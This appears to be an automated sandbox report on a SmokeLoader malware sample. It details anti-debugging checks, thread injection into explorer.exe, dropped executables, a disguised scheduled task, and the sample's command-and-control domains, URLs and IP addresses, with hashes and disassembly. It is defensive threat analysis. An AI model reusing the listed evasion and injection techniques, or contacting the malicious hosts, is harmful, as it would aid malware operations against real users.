Source: explorer.exe, 00000006.00000000.414139848.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000006.00000000.414139848.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.406831856.00000000043B0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.414139848.00000000086E7000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000006.00000000.385060326.0000000008631000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe

System information queried: CodeIntegrityInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\vgfsabt

Code function: 9_2_00405EC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_00405EC0

Source: C:\Users\user\AppData\Roaming\vgfsabt

Code function: 9_2_004028BE LoadLibraryA,GetProcAddress,

9_2_004028BE

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0053092B mov eax, dword ptr fs:[00000030h]		1_2_0053092B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00530D90 mov eax, dword ptr fs:[00000030h]		1_2_00530D90

Source: C:\Users\user\Desktop\file.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_004039D2 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_004039D2
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_00406E1E SetUnhandledExceptionFilter,	9_2_00406E1E
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_00405EC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00405EC0
Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: 9_2_0040472E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040472E
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_004039D2 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_004039D2
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_00406E1E SetUnhandledExceptionFilter,	10_2_00406E1E
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_00405EC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00405EC0
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: 10_2_0040472E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0040472E

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: vgfsabt.6.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: vatra.at
Source: C:\Windows\explorer.exe	Domain query: degroeneuitzender.nl
Source: C:\Windows\explorer.exe	Network Connect: 181.215.246.89 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe

Thread created: C:\Windows\explorer.exe EIP: 28F19E0

Jump to behavior

Source: explorer.exe, 00000006.00000000.380032746.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.445021113.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.385271841.00000000086B6000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.405365268.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.427508489.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.374969941.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: uProgram Manager*r
Source: explorer.exe, 00000006.00000000.405365268.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.427508489.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.374969941.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.405365268.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.427508489.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.374969941.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.404982920.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.374755637.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.426700719.0000000000878000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanLoc*U

Source: C:\Users\user\AppData\Roaming\vgfsabt	Code function: GetLocaleInfoA,		9_2_0040D99F
Source: C:\Users\user\AppData\Local\Temp\1E3.exe	Code function: GetLocaleInfoA,		10_2_0040D99F

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\vgfsabt

Code function: 9_2_00407430 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

9_2_00407430

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 1.3.file.exe.540000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.530e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363432938.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 1.3.file.exe.540000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.file.exe.530e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.448295011.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.447941721.0000000000540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.363432938.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.428004602.00000000028F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	32 Process Injection	11 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Hidden Files and Directories	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Software Packing	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\1E3.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\vgfsabt	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.file.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.file.exe.530e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.3.file.exe.540000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
vatra.at	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://degroeneuitzender.nl/systems/index.php	0%	URL Reputation	safe
http://cracker.biz/tmp/	0%	URL Reputation	safe
http://skinndia.com/tmp/	0%	URL Reputation	safe
http://vatra.at/tmp/	0%	URL Reputation	safe
http://schemas.microsoft.coyyL	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
degroeneuitzender.nl	5.135.247.111	true	true		unknown
vatra.at	195.158.3.162	true	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://degroeneuitzender.nl/systems/index.php	false	URL Reputation: safe	unknown
http://cracker.biz/tmp/	true	URL Reputation: safe	unknown
http://skinndia.com/tmp/	true	URL Reputation: safe	unknown
http://vatra.at/tmp/	true	URL Reputation: safe	unknown
http://piratia-life.ru/tmp/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000006.00000000.405148588.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.427104048.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.374860423.000000000091F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.microsoft.coyyL	explorer.exe, 00000006.00000000.417080410.000000000EBD2000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
93.112.238.85	unknown	Saudi Arabia	25019	SAUDINETSTC-ASSA	true
5.135.247.111	degroeneuitzender.nl	France	16276	OVHFR	true
195.158.3.162	vatra.at	Uzbekistan	8193	BRM-ASUZ	true
211.171.233.126	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
181.215.246.89	unknown	Chile	60458	ASN-XTUDIONETES	true
190.140.74.43	unknown	Panama	18809	CableOndaPA	false
175.120.254.9	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
58.235.189.192	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	777186
Start date and time:	2023-01-03 09:44:09 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@4/3@13/8
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 75% (good quality ratio 66.8%) Quality average: 70.4% Quality standard deviation: 34.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 19 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
09:46:26	Task Scheduler	Run new task: Firefox Default Browser Agent 55CE28A7D25DA4BB path: C:\Users\user\AppData\Roaming\vgfsabt

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
93.112.238.85	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
	file.exe	Get hash	malicious	Browse	vatra.at/tmp/
5.135.247.111	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	L9wmLVWpWK.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
degroeneuitzender.nl	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	L9wmLVWpWK.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
vatra.at	file.exe	Get hash	malicious	Browse	211.119.84.112
	file.exe	Get hash	malicious	Browse	93.112.238.85
	file.exe	Get hash	malicious	Browse	211.119.84.111
	file.exe	Get hash	malicious	Browse	175.119.10.231
	file.exe	Get hash	malicious	Browse	123.140.161.243
	file.exe	Get hash	malicious	Browse	175.126.109.15
	file.exe	Get hash	malicious	Browse	175.119.10.231
	file.exe	Get hash	malicious	Browse	211.53.230.67
	file.exe	Get hash	malicious	Browse	175.119.10.231
	file.exe	Get hash	malicious	Browse	109.102.255.230
	file.exe	Get hash	malicious	Browse	175.119.10.231
	file.exe	Get hash	malicious	Browse	123.140.161.243
	file.exe	Get hash	malicious	Browse	123.140.161.243
	file.exe	Get hash	malicious	Browse	151.251.24.5
	L9wmLVWpWK.exe	Get hash	malicious	Browse	181.94.48.228
	file.exe	Get hash	malicious	Browse	123.140.161.243
	file.exe	Get hash	malicious	Browse	84.224.172.131
	file.exe	Get hash	malicious	Browse	190.219.54.242
	file.exe	Get hash	malicious	Browse	211.119.84.111
	file.exe	Get hash	malicious	Browse	175.126.109.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SAUDINETSTC-ASSA	file.exe	Get hash	malicious	Browse	93.112.238.85
	file.exe	Get hash	malicious	Browse	93.112.238.85
	file.exe	Get hash	malicious	Browse	93.112.238.85
	file.exe	Get hash	malicious	Browse	93.112.238.85
	file.exe	Get hash	malicious	Browse	2.88.92.23
	file.exe	Get hash	malicious	Browse	2.88.92.23
	file.exe	Get hash	malicious	Browse	2.88.92.23
	file.exe	Get hash	malicious	Browse	93.112.238.85
	file.exe	Get hash	malicious	Browse	2.91.189.255
	file.exe	Get hash	malicious	Browse	2.91.189.255
	file.exe	Get hash	malicious	Browse	93.112.238.85
	file.exe	Get hash	malicious	Browse	188.55.82.192
	file.exe	Get hash	malicious	Browse	188.49.114.140
	file.exe	Get hash	malicious	Browse	93.112.238.85
	sSB5yHCWJg.elf	Get hash	malicious	Browse	94.98.191.253
	file.exe	Get hash	malicious	Browse	5.163.180.22
	file.exe	Get hash	malicious	Browse	188.55.103.27
	file.exe	Get hash	malicious	Browse	2.88.127.152
	rad6um18Mh.elf	Get hash	malicious	Browse	94.98.191.226
	80000.dll	Get hash	malicious	Browse	37.56.111.49

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ce5f3254611a8c095a3d821d44539877	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	GsixVTA6hs.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	L9wmLVWpWK.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111
	frJ0A6bu3o.exe	Get hash	malicious	Browse	5.135.247.111
	file.exe	Get hash	malicious	Browse	5.135.247.111

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\1E3.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	650752
Entropy (8bit):	7.459319971555059
Encrypted:	false
SSDEEP:	12288:8zehz7flyOy9EQZe6Zohw87Me/YlaJWD1KkVFe8tXTMENi+7:8UzByOyPZDZofge/hS1NVF3xTtN
MD5:	B2FDE4A8B7D6AA7E0FA7F853899F1C4F
SHA1:	17349645171D6D99D95B597E462513BDDEED1D4C
SHA-256:	80F748BCBC373132E361C85DEF9887BAE38EA8F9B72B06539D24321BE8111D93
SHA-512:	9653CEE1F673D4CA726C0790470260EE4EEBAD108A47F455844FAAC56880E98BE06901E3CB5E762CCFEE6DBD51BBC3762E7BB691D18856086212028C2A524B07
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........=.snn.snn.snn.!.n.snn.!.n.snn.!.n.snn..n.snn.son.snn.!.n.snn.!.n.snn.!.n.snnRich.snn........................PE..L...f.Ob..................... .......?............@..........................@......2s......................................t...<.......0k................... .......................................%..@...............d............................text............................... ..`.data...\|........l..................@....rsrc...0k.......l...j..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vgfsabt

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	341504
Entropy (8bit):	6.638746109906065
Encrypted:	false
SSDEEP:	6144:IdLLsrs6dNPpKqibWQFvVquxsV5p5KjAWTM4xVvkHb+ewB:ILgrs6daqo33jxsV5KXTMENi+7
MD5:	D0BF82E7840B3179B85D665A3AE895A5
SHA1:	F97D45F0DF4B91FA8756AF2A4AC4B7BC28A79C14
SHA-256:	40C8ADAEE430093BF55E59066013C9EF5959D617751930D1B77944C5BC769527
SHA-512:	50FCE94219099B9B5A44FF912F935E5302F209ADD82E2FEFB94DD763D1A7DA373A3293F73431807ABC4BDF7A726ED467E2AAB26B4687F75E0E861A47EF9E3896
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........=.snn.snn.snn.!.n.snn.!.n.snn.!.n.snn..n.snn.son.snn.!.n.snn.!.n.snn.!.n.snnRich.snn........................PE..L....~.`.....................h.......?............@..................................q......................................t...<.......0k...................p.......................................%..@...............d............................text............................... ..`.data...............................@....rsrc...0k.......l..................@..@.reloc.......p....... ..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vgfsabt:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.638746109906065
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	341504
MD5:	d0bf82e7840b3179b85d665a3ae895a5
SHA1:	f97d45f0df4b91fa8756af2a4ac4b7bc28a79c14
SHA256:	40c8adaee430093bf55e59066013c9ef5959d617751930d1b77944c5bc769527
SHA512:	50fce94219099b9b5a44ff912f935e5302f209add82e2fefb94dd763d1a7da373a3293f73431807abc4bdf7a726ed467e2aab26b4687f75e0e861a47ef9e3896
SSDEEP:	6144:IdLLsrs6dNPpKqibWQFvVquxsV5p5KjAWTM4xVvkHb+ewB:ILgrs6daqo33jxsV5KXTMENi+7
TLSH:	FA74AD306390E875FB1A05758825DAE06E69F8738F506AB37328771F9A70DF1823ED94
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........=.snn.snn.snn.!.n.snn.!.n.snn.!.n.snn...n.snn.son.snn.!.n.snn.!.n.snn.!.n.snnRich.snn........................PE..L....~.`...

File Icon


Icon Hash:	b4bc96b6b69486e2

Static PE Info

General

Entrypoint:	0x403ffe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x60EB7E99 [Sun Jul 11 23:28:25 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	ac60a8dcc69324c92e3ea84189250edd

Entrypoint Preview

Instruction
call 00007F8DA8336FD2h
jmp 00007F8DA8333A1Eh
int3
int3
int3
int3
int3
int3
int3
int3
call 00007F8DA8333BDCh
xchg cl, ch
jmp 00007F8DA8333BC4h
call 00007F8DA8333BD3h
fxch st(0), st(1)
jmp 00007F8DA8333BBBh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007F8DA8333BB1h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007F8DA8333BA6h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007F8DA8333BA4h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007F8DA8333BA7h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007F8DA83347BFh
fstp st(0)
fld tbyte ptr [004114BAh]
ret
fstp st(0)
or cl, cl
je 00007F8DA8333BADh
fstp st(0)
fldpi
or ch, ch
je 00007F8DA8333BA4h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007F8DA8333B99h
fchs
ret
fstp st(0)
jmp 00007F8DA8334795h
fstp st(0)
mov cl, ch
jmp 00007F8DA8333BA2h
call 00007F8DA8333B6Eh
jmp 00007F8DA83347A0h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, 00000030h

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10174	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x30000	0x26b30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x57000	0xaa4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11b0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x25c0	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x164	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
